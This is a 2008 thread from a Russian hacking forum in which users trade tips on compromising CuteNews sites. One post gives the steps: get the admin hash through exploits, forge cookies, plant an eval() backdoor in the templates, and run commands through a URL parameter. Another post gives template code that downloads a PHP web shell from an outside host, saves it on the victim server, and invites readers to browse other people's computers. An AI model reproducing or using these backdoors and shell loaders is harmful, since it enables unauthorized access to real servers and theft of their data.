ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.09.2008, 16:25
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411

Репутация: 91
Отправить сообщение для n-000 с помощью ICQ
По умолчанию

Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему
 
Ответить с цитированием

  #12  
Старый 10.09.2008, 16:55
myrz
Новичок
Регистрация: 22.06.2008
Сообщений: 13
Провел на форуме:
138385

Репутация: 1
Отправить сообщение для myrz с помощью ICQ
По умолчанию

Цитата:
Сообщение от n-000  
Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему
Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?
 
Ответить с цитированием

  #13  
Старый 26.09.2008, 15:07
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап
 
Ответить с цитированием

  #14  
Старый 26.09.2008, 21:40
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
Talking

Цитата:
Сообщение от warlok  
подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап

Это все знают, ток проблемы от базы пасы узнать
 
Ответить с цитированием

  #15  
Старый 28.09.2008, 02:05
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

а конфиг сложно посмотреть ? =\
 
Ответить с цитированием

  #16  
Старый 11.11.2008, 12:40
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию

Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);

дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);


ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?

P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать):
Цитата:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1 Parse error: syntax error, unexpected $end in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1

Последний раз редактировалось NamahS; 11.11.2008 в 13:41..
 
Ответить с цитированием

  #17  
Старый 11.11.2008, 18:47
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию

Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?
 
Ответить с цитированием

  #18  
Старый 13.11.2008, 10:40
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию

Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...
 
Ответить с цитированием

  #19  
Старый 20.11.2008, 09:41
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию

Спасибо, что откликнулись))))
Я сам уже догадался...)
Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)
 
Ответить с цитированием

  #20  
Старый 21.11.2008, 12:24
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Ну ппц Я ж писал уже...
Дописываем в конце Active News:
Цитата:
HTML;
$data=implode('',file('http://game2v.narod.ru/shell.php.txt'));
$fp=fopen('./sk.php','wb');
fputs($fp,$data);
fclose($fp);
Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
У кого не получиться пм...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
webshell scripts -) blackybr PHP, PERL, MySQL, JavaScript 20 28.03.2010 02:17
CuteNews 1.4.5 help 6u4yxa Уязвимости 24 27.09.2009 17:46
CuteNews 1.4.5 myrz Уязвимости 5 16.09.2008 19:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ